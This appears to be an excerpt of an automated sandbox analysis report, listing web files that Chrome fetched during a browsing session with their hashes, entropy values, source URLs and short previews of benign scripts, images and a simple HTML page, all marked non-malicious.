                                                                                                                                                                                                        SHA-512:C0042D44A4779758D761D7CA41BB9AA710F1B8529CD53E621619E59D0A35C8D9A510B08CCE54657E119559725F1C7B270F1F11488FBCA31BFFFEFF74D2664664
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://pblc.me/favicon.ico
                                                                                                                                                                                                        Preview:not found: GET /favicon.ico
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (30828)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):31235
                                                                                                                                                                                                        Entropy (8bit):5.251714059543231
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:puAlXTTsfSKsMoqSeUDbn4zSfZcwEb6rk27DX8:HlX3sfSHdfyw/r0
                                                                                                                                                                                                        MD5:B2DCC20E7FC37F3902ACC3EB78B125B1
                                                                                                                                                                                                        SHA1:FE92D3BF2ED2E0D7665F6689BE12E290F8A9DF1A
                                                                                                                                                                                                        SHA-256:681F2A7C36718C8FE70259ED53E869E46626A14720814CDB576BA0210B3677D1
                                                                                                                                                                                                        SHA-512:AC36F36B9C9AB2BD9DB9D955F1737C83F25D3E7EF0DFE5D7E5D2C264A48CE316E6DA1FAC9C152F364F7FF4CAA848F1E2657C5E096329D86CAD6FBB18C8CEE892
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://indd.adobe.com/newrelic_browser/newrelic.js
                                                                                                                                                                                                        Preview:;window.NREUM||(NREUM={});NREUM.init={distributed_tracing:{enabled:true},privacy:{cookies_enabled:true},ajax:{deny_list:["bam-cell.nr-data.net"]}};.window.NREUM||(NREUM={}),__nr_require=function(t,e,n){function r(n){if(!e[n]){var o=e[n]={exports:{}};t[n][0].call(o.exports,function(e){var o=t[n][1][e];return r(o||e)},o,o.exports)}return e[n].exports}if("function"==typeof __nr_require)return __nr_require;for(var o=0;o<n.length;o++)r(n[o]);return r}({1:[function(t,e,n){function r(t){try{s.console&&console.log(t)}catch(e){}}var o,i=t("ee"),a=t(32),s={};try{o=localStorage.getItem("__nr_flags").split(","),console&&"function"==typeof console.log&&(s.console=!0,o.indexOf("dev")!==-1&&(s.dev=!0),o.indexOf("nr_dev")!==-1&&(s.nrDev=!0))}catch(c){}s.nrDev&&i.on("internal-error",function(t){r(t.stack)}),s.dev&&i.on("fn-err",function(t,e,n){r(n.stack)}),s.dev&&(r("NR AGENT IN DEVELOPMENT MODE"),r("flags: "+a(s,function(t,e){return t}).join(", ")))},{}],2:[function(t,e,n){function r(t,e,n,r,s){try{l?
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, baseline, precision 8, 500x449, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):23952
                                                                                                                                                                                                        Entropy (8bit):7.956350927855447
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:LLYzvhO82FdmwRMS3tUIoz7SKaAG88hCDkq5/4vhPeKtVrc4X0QHuvrG:LLYzg33tUvSKao2uzwvh2KHjHuDG
                                                                                                                                                                                                        MD5:3CC029F515EBF5471BBC051031F6643D
                                                                                                                                                                                                        SHA1:2C418666F773407CB9E13F6C0FB6720320B23A01
                                                                                                                                                                                                        SHA-256:C7AF771D2F426DB31AAF1E35B25CD1483F3F15C4E628EDBAE34B8423C54A6AE5
                                                                                                                                                                                                        SHA-512:A2128AEED0E48BCC40616D1CAC31F83F91BFE96EEE6A6CBBECA7E6A04B52FDE797016FE2C95CCD5957DAF65A40338C61D5120D12832DB91518E60765274CABB8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((...........".........................................O..........................!1...2AQRUaq...."ST.....35BCt..#s..6cr..47b.$%&D...................................>.........................!1R...AQbq....4a....."B23S..#5..$Cr............?...Y..n|..cE.<....[.3...4..........W....zg.....x..^R.....UZ..H..(...Rv..n.r...yt..P?.;4|....y..+X....Z.W....z..g..c.k{..9..+X..:G.....6.h.'...S.\.....l.C.s.o|St8.:...[[..4.=f.U.<..@.|^.Q.R..R|..J..&..g..c.k{..9..+X.........5..n...H..%.QW.K..J.v.o...q.u..n...Z.....%....D..a........J.M.QD:.V.'.=....[....1...Z.|.68....f......LS..M]..A...F@..(p...W..U+5t.e...9..)..c.k{..EOup+.....=....[....1...Z.M.=..i.o>&.t8.:...7C.s.o|V..EOup.j.....1...M....[...D.S.\.....l.C.s.o|St8.:...k.4T.W......=....[....1...Z.M.=..i.o>&.t8.:...7C.s.o|V..EOup.j.....1...M....[...D.S.\.....l.C..o|St8.:...k.4T.W....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (17276), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):17276
                                                                                                                                                                                                        Entropy (8bit):5.275563685354605
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:WKEO0mA6Hs8Bbp6f+Uf+XKyPjCJkvQf+WaRXbsi7v:WKGmA6Hsm5b9FD
                                                                                                                                                                                                        MD5:8409DABBC7D3609DD0E668419C54102D
                                                                                                                                                                                                        SHA1:DFB8DDA9B07D68E90065E079C4BE90A3090A82BC
                                                                                                                                                                                                        SHA-256:C9B8554C63C8CB6D2F9FCBFCF1755C5DFA678C13199F7FA44BD3B7A57F34C1F0
                                                                                                                                                                                                        SHA-512:9309F06E3967EB7ACFB2586B3857D352930BD1514F343B8410692663DE218254EA9A2AB8DB5C96BAD7D943CD5573A55A3B21A29FDF4483389C2489B48DC0FCA5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(()=>{"use strict";var e,n,t={231:(e,n,t)=>{t.d(n,{A:()=>r,j:()=>o});var r="0",o="SPLITSIGNAL_APPLY"},4424:(e,n,t)=>{t.d(n,{CX:()=>u,D1:()=>i,VZ:()=>r,ew:()=>o});var r=function(e){return"errors"===e._tag},o=function(e){return"complete"===e._tag},i=function(e){return{_tag:"errors",errors:e}},u=function(e){return{_tag:"complete",undo:e}}},9938:(e,n,t)=>{var r,o;t.d(n,{Kc:()=>c,Qy:()=>r,Rv:()=>l,cQ:()=>s,gf:()=>i,nl:()=>a,ug:()=>o,y8:()=>u}),function(e){e.upperCase="UPPER",e.lowerCase="LOWER",e.titleCase="TITLE",e.capitalize="CAPITALIZE"}(r||(r={})),function(e){e.After="AFTER",e.Before="BEFORE",e.FirstChild="FIRST_CHILD",e.LastChild="LAST_CHILD"}(o||(o={}));var i=function(e,n){return"ADD_ELEMENT"===e},u=function(e,n){return"MOVE_ELEMENT"===e},a=function(e,n){return"DELETE_ELEMENT"===e},c=function(e,n){return"REPLACE_CONTENT"===e},l=function(e,n){return"UPDATE_ELEMENT_ATTR"===e},s=function(e,n){return"UPDATE_ELEMENT_TYPE"===e}},7199:(e,n,t)=>{t.d(n,{BJ:()=>r,QT:()=>s,XG:()=>d,Y3:()=>v,aH:(
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):110652
                                                                                                                                                                                                        Entropy (8bit):6.034917564422843
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:xRRO9VL43le3xutZ1joz/u7RqiQ+HhDEMwMRIK/iOq:5uVLQ7joq9bQ+HdyBKqOq
                                                                                                                                                                                                        MD5:51D8D7491DCD6E2B11BB7AD8D1F136C1
                                                                                                                                                                                                        SHA1:2504150B5D2F765D08DB85B5D963DF2E573E2E6D
                                                                                                                                                                                                        SHA-256:580BE7F1C4ACDD9C8CBD222A963E60BF194F6D234C8C0F5B2BA0D48B0BC1F990
                                                                                                                                                                                                        SHA-512:7DF92843023E2BE3BFD1F492E44BB0718B43D39EE7D10E0CFD09BFF61F12183DE5FF7772724CDC4547504E7990524C2E0E5BB6F7A8860D6B362EE596385A903E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/images/yahoo_client.svg
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="136px" height="136px" viewBox="0 0 136 136" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>4</title>. <defs>. <path d="M7.94230769,0 L110.057692,0 C114.444108,0 118,3.55589228 118,7.94230769 L118,110.057692 C118,114.444108 114.444108,118 110.057692,118 L7.94230769,118 C3.55589228,118 0,114.444108 0,110.057692 L0,7.94230769 C0,3.55589228 3.55589228,0 7.94230769,0 Z" id="path-1"></path>. <filter x="-12.3%" y="-8.9%" width="124.6%" height="124.6%" filterUnits="objectBoundingBox" id="filter-2">. <feMorphology radius="0.5" operator="dilate" in="SourceAlpha" result="shadowSpreadOuter1"></feMorphology>. <feOffset dx="0" dy="4" in="shadowSpreadOuter1" result="shadowOffsetOuter1"></feOffset>. <feGaussianBlur stdDeviation="4" in="shadowOffsetOuter1" result="shadowBlurOuter1"></feGaussianBlur>. <feComposite in="shadowBlurOuter1" i
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):6253
                                                                                                                                                                                                        Entropy (8bit):7.462651204484158
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+7jOh5N26MT0D5MdtbZPAVwzVJUko+qdpxzB6wWrH7ZmU/H:+7ChoYNMtKwX2xU5DFf
                                                                                                                                                                                                        MD5:D4E3C1CC68D4E005059AD55071A8E266
                                                                                                                                                                                                        SHA1:734449D5D78E060996CD33056BEECB3A4399A380
                                                                                                                                                                                                        SHA-256:9FD44A418C8BA3F75C67054E51A9AA298E7720C962B8E8543485DC5C71ED7714
                                                                                                                                                                                                        SHA-512:AA0C63641E093263A0B4B110FC2D90DD2A1AF833454148DDC7911781CD579C48E3ECA1CCE49C54C973836C26BEA32A8944DCF3DF54251CF44114C58576023BC5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/442879c8-fca4-4a7c-b165-49dc05cf7999.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D............h.................^...Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......x........pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (437), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6888
                                                                                                                                                                                                        Entropy (8bit):4.693528432343136
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:G1S2kG4NnlQDTTzHlCH4SN2OPsQIR2DlajLb:cSoKsTzHIPZajLb
                                                                                                                                                                                                        MD5:8B2E9E29CB683F033296FB9B97701379
                                                                                                                                                                                                        SHA1:93428E572B0D9AB21C942DE292F8AB9E5DABDA58
                                                                                                                                                                                                        SHA-256:0A363608DC6CF55A0CCD3BE0880B489629CA01ACE01E2FF1F9BA768C75E7D8C5
                                                                                                                                                                                                        SHA-512:9ED9B556054662586F3933BDEB3E98863FC98F544E5BBF52C32865861D709265BFD6CC4F9825A86638A25DFB6993587F121D32B71D6551366D4525E1A210C32F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Supercar Society - quantumspirel.ru</title>.. <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">.. <style>.. body {.. padding-top: 56px;.. background-color: #f8f9fa;.. }.. .hero {.. background: url('https://th.bing.com/th/id/OIP.IZX0v7PSJw8SsOtTa4ToqwHaE8') no-repeat center center;.. background-size: cover;.. color: white;.. padding: 150px 0;.. text-align: center;.. }.. .content-section {.. padding: 60px 0;.. }.. .footer {.. background: #343a40;.. color: white;.. padding: 20px 0;.. text-ali
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):1796
                                                                                                                                                                                                        Entropy (8bit):4.045166220882716
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:tIPGMt1MxWbf6x4Tibf6x4Libf6x4nibf6x4/ibf6x4l:MGiEsQEkQEUQEOQEW
                                                                                                                                                                                                        MD5:7E651C149AA43F8201B4C4CBA338515F
                                                                                                                                                                                                        SHA1:E24E5B1BFC857362D31ED1DA1DC13B818A984D4F
                                                                                                                                                                                                        SHA-256:F055243F64EC0A2DB0B8C949B65863B5870EF1C932D7F9823F1CCB78D0D434D5
                                                                                                                                                                                                        SHA-512:6874C6EC6D0914A2C312EAC52CDF8F428156C50677D760039CA6300C855BFCE6E4B0476671664D62B99A7199FD83B8F171CC11D5FF8CAE5CB178B06722982032
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/images/group-2.svg
                                                                                                                                                                                                        Preview:<svg width="143" height="28" viewBox="0 0 143 28" xmlns="http://www.w3.org/2000/svg">. <g fill="#FFB931" fill-rule="evenodd">. <path d="m13.535 21.245-5.97 3.138a1 1 0 0 1-1.451-1.054l1.14-6.648a1 1 0 0 0-.288-.885l-4.83-4.708a1 1 0 0 1 .554-1.706l6.675-.97a1 1 0 0 0 .753-.547l2.985-6.048a1 1 0 0 1 1.794 0l2.985 6.048a1 1 0 0 0 .753.547l6.675.97a1 1 0 0 1 .554 1.706l-4.83 4.708a1 1 0 0 0-.288.885l1.14 6.648a1 1 0 0 1-1.45 1.054l-5.97-3.138a1 1 0 0 0-.931 0zM42.235 21.245l-5.97 3.138a1 1 0 0 1-1.451-1.054l1.14-6.648a1 1 0 0 0-.288-.885l-4.83-4.708a1 1 0 0 1 .554-1.706l6.675-.97a1 1 0 0 0 .753-.547l2.985-6.048a1 1 0 0 1 1.794 0l2.985 6.048a1 1 0 0 0 .753.547l6.675.97a1 1 0 0 1 .554 1.706l-4.83 4.708a1 1 0 0 0-.288.885l1.14 6.648a1 1 0 0 1-1.45 1.054l-5.97-3.138a1 1 0 0 0-.931 0zM70.935 21.245l-5.97 3.138a1 1 0 0 1-1.451-1.054l1.14-6.648a1 1 0 0 0-.288-.885l-4.83-4.708a1 1 0 0 1 .554-1.706l6.675-.97a1 1 0 0 0 .753-.547l2.985-6.048a1 1 0 0 1 1.794 0l2.985 6.048a1 1 0 0 0 .753.547
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):8368
                                                                                                                                                                                                        Entropy (8bit):7.6398237675446055
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:+7VoYNMtKwXD7V7UNlt4FW81pNn1eQnUyod2kt:ZYNg7XD7V7+T4FWuNnvpokkt
                                                                                                                                                                                                        MD5:495B60C07BF3DE8D4ADAB89C3F5806CD
                                                                                                                                                                                                        SHA1:A758E351A640AB3A45F5CDE06EDD0B9098E43A43
                                                                                                                                                                                                        SHA-256:945054AD980F085CBB0F825D92D6FF4DD63EB90DCFBC111E6FE8E07C46C479C4
                                                                                                                                                                                                        SHA-512:F9E272BE7E66C0A20CEC7852C5F48A5AF1F4ABC2F519012A0284B1E2DBF0AA1464B874F52B6F10E16D228F3CFAE236D67F9BD90B61CDD7AA3D4E4FF2EA3CD260
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/08d2adc0-b055-41c3-9caa-981ebab6ae4e.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D............\...T.............R...Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......x...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (52555), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):52555
                                                                                                                                                                                                        Entropy (8bit):5.3314258505062355
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:weXreezYoNbmP+FUJcBtopGTaY/zcAcbcVvPxaTLYqj6cw68Kv84d3ltnakthU2r:3SP+qjJ7kJGabI
                                                                                                                                                                                                        MD5:D6435A9A90528568FD8EBAB2F8731A63
                                                                                                                                                                                                        SHA1:59D986AE6C1D0F4B8DC9578959C185649AFC78DD
                                                                                                                                                                                                        SHA-256:266BB1AEEED98CE42DB341998C42B22B55462456FC7F69410CA1B19AFE1D83AE
                                                                                                                                                                                                        SHA-512:1AE492AE40B0834A6B15C994AC5F777CE1BBCCE9E80070973D3DF648BD86D6E46CA1A0DD004AEEC11988464C2A73238EC9180B6F090AF344508684F340A6CDBB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[24],{"+f1A":function(e,t,n){"use strict";n.d(t,"q",function(){return s}),n.d(t,"w",function(){return d}),n.d(t,"m",function(){return l}),n.d(t,"b",function(){return f}),n.d(t,"a",function(){return b}),n.d(t,"t",function(){return O}),n.d(t,"u",function(){return p}),n.d(t,"r",function(){return v}),n.d(t,"k",function(){return E}),n.d(t,"s",function(){return g}),n.d(t,"e",function(){return j}),n.d(t,"g",function(){return _}),n.d(t,"h",function(){return I}),n.d(t,"f",function(){return C}),n.d(t,"l",function(){return h}),n.d(t,"p",function(){return m}),n.d(t,"c",function(){return T}),n.d(t,"v",function(){return y}),n.d(t,"o",function(){return S}),n.d(t,"i",function(){return R}),n.d(t,"j",function(){return A}),n.d(t,"n",function(){return N}),n.d(t,"d",function(){return x});var r=n("mj2O"),a=n.n(r),c=n("7SM1"),i=n("QtlZ"),o=n("NFvl"),u=n("LVcX"),s=function getSession(){if(!i.a||!i.a.getState)return{};var e=Object(i.b)().session;return void 0
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1957)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3093
                                                                                                                                                                                                        Entropy (8bit):5.5803398668509105
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:D0Oz+y/clUyAQHWs5+TaorOFzyHOgeEh7z5jFqxv4tk5YHIeklwjviDuExjGx:g2+5AQHAray48f5JMYHIqjviDu9
                                                                                                                                                                                                        MD5:A34DA8C52525D3689F7BB764E2A2A4B0
                                                                                                                                                                                                        SHA1:4A0EB83392DEFA76049E6FC2D758ABC151BF6217
                                                                                                                                                                                                        SHA-256:CE5C043020706BFE72EE17BB51944C4E6001EC9C16D23928822AB818B34045A2
                                                                                                                                                                                                        SHA-512:D3998337CE49AFD50CFA7E027775594F0863151A52A08E508E8F5D46A02F0A30A2A3723DC622EA006A63C62064E6AA8725974FC6A397C7989ECE23E437A3C405
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://connect.facebook.net/en_US/sdk.js
                                                                                                                                                                                                        Preview:/*1725033364,,JIT Construction: v1016108272,en_US*/../**. * Copyright (c) 2017-present, Facebook, Inc. All rights reserved.. *. * You are hereby granted a non-exclusive, worldwide, royalty-free license to use,. * copy, modify, and distribute this software in source code or binary form for use. * in connection with the web services and APIs provided by Facebook.. *. * As with any software that integrates with the Facebook platform, your use of. * this software is subject to the Facebook Platform Policy. * [http://developers.facebook.com/policy/]. This copyright notice shall be. * included in all copies or substantial portions of the software.. *. * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR. * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS. * FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR. * COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER. * IN AN ACTION OF CO
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2134)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):13188
                                                                                                                                                                                                        Entropy (8bit):5.4223896155104025
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:i11kqRm4UjryX2DfatZrT80NCGz5r2zItrX:iEqRm4cy338m7d
                                                                                                                                                                                                        MD5:7C96A5F11D9741541D5E3C42FF6380D7
                                                                                                                                                                                                        SHA1:D3FA2564C021CF730E58FFDDB138CF6B57ED126E
                                                                                                                                                                                                        SHA-256:81016AC6BE850B72DF5D4FAA0C3CEC8E2C1B0BA0045712144A6766ADFAD40BEE
                                                                                                                                                                                                        SHA-512:23C162A2E268951729B580E5035AD6CA9969CFCC5CE58A220817B912E76B38BE6C29C3CA7680CB4E8198863D95A72EA65BD06FF7189B5C8475E4C1CE501AEAB1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:/*. * Copyright 2016 Small Batch, Inc.. *. * Licensed under the Apache License, Version 2.0 (the "License"); you may not. * use this file except in compliance with the License. You may obtain a copy of. * the License at. *. * http://www.apache.org/licenses/LICENSE-2.0. *. * Unless required by applicable law or agreed to in writing, software. * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT. * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the. * License for the specific language governing permissions and limitations under. * the License.. */./* Web Font Loader v1.6.26 - (c) Adobe Systems, Google. License: Apache 2.0 */(function(){function aa(a,b,c){return a.call.apply(a.bind,arguments)}function ba(a,b,c){if(!a)throw Error();if(2<arguments.length){var d=Array.prototype.slice.call(arguments,2);return function(){var c=Array.prototype.slice.call(arguments);Array.prototype.unshift.apply(c,d);return a.apply(b,c)}}return function(){return a.app
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (32086)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):167931
                                                                                                                                                                                                        Entropy (8bit):5.38581826717555
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:vNMyqhJvN32cBC7M6Whca98HrAjwggKYDdRgongAqFFHcw:vq17hbvca98HrkgKYDdRgogAqFRT
                                                                                                                                                                                                        MD5:201782983FC4FA6864EAD91A08071690
                                                                                                                                                                                                        SHA1:1007CA736CD67D5CBF27D3AE82156FFC3A6AC0A0
                                                                                                                                                                                                        SHA-256:0CF517631FB0C24CE50B2BCB153C48FC0A7F4033929F63FE32FDD22AC26AE2F3
                                                                                                                                                                                                        SHA-512:FAF601058A605066C34A601600F461612EE0855FDD7EE122427039810420255905CE1024D353ABE4645EFE6071E58217FC9A35FA83E87FF42AABEF48958531D1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://indd.adobe.com/1_c19ab23/public/build/contentHandler/contentHandler.html?basepath=https://indd.adobe.com&relativepath=1/publication.html&parentorigin=https://indd.adobe.com&maxPageDimensions={%22width%22:612,%22height%22:792}&transition=false"
                                                                                                                                                                                                        Preview:<!DOCTYPE html><html><head><meta http-equiv="X-UA-Compatible" content="IE=EDGE"><meta charset="utf-8"><link rel="stylesheet" type="text/css" href="contentHandler.min.css"><script>/*! jQuery v1.11.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.1",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):77
                                                                                                                                                                                                        Entropy (8bit):4.37144473219773
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:k0WYL12AvZ/W6QfpX/W6Qee:UYR2AvZO6EpXO6I
                                                                                                                                                                                                        MD5:B6652DF95DB52FEB4DAF4ECA35380933
                                                                                                                                                                                                        SHA1:65451D110137761B318C82D9071C042DB80C4036
                                                                                                                                                                                                        SHA-256:6F5B4AA00D2F8D6AED9935B471806BF7ACEF464D0C1D390260E5FE27F800C67E
                                                                                                                                                                                                        SHA-512:3390C5663EF9081885DF8CDBC719F6C2F1597A4E25168529598097E9472608A4A62EC7F7E0BC400D22AAC81BF6EA926532886E4DC6E4E272D3B588490A090473
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://reviews.capterra.com/_next/static/rlbEn55nmth45KPaQkAHZ/_ssgManifest.js
                                                                                                                                                                                                        Preview:self.__SSG_MANIFEST=new Set,self.__SSG_MANIFEST_CB&&self.__SSG_MANIFEST_CB();
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):48209
                                                                                                                                                                                                        Entropy (8bit):5.451523506096864
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:MGv7EN63s3iA3AyKnMCMrmomw+a3Bw3VF3G3M3RUwmF7rovwXF8qj6wAF5paFwJH:tAXQcrKfw+6y72gUL5F1E
                                                                                                                                                                                                        MD5:031ED6D8C378FF1545BCE82D8FBFCB28
                                                                                                                                                                                                        SHA1:AC92D776C6D0CDF28A6D32A63DFCA685F8926FAC
                                                                                                                                                                                                        SHA-256:77A32AD98D7F181CF896DB281B5BB0D1DC8F36D1A116BD1BF7A5B1DBC7CA72B4
                                                                                                                                                                                                        SHA-512:72277422D7F7E6A12CF99D7DB869301E0CD6B35EE5EBF52E75CD74CB4C7EFF7AB4545216382E2CF98B52A2C2A244AC4C7D2559183040D3E732A974A44EF1181E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
